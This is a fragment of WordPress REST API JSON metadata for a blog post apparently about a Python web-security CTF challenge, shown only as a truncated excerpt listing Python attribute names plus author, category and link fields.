__class__\u3001__dir__\u3001__getat......","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[23],"tags":[9,31],"class_list":["post-277","post","type-post","status-publish","format-standard","hentry","category-web-security","tag-ctf","tag-python"],"_links":{"self":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=277"}],"version-history":[{"count":28,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/277\/revisions"}],"predecessor-version":[{"id":502,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/277\/revisions\/502"}],"wp:attachment":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=277"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}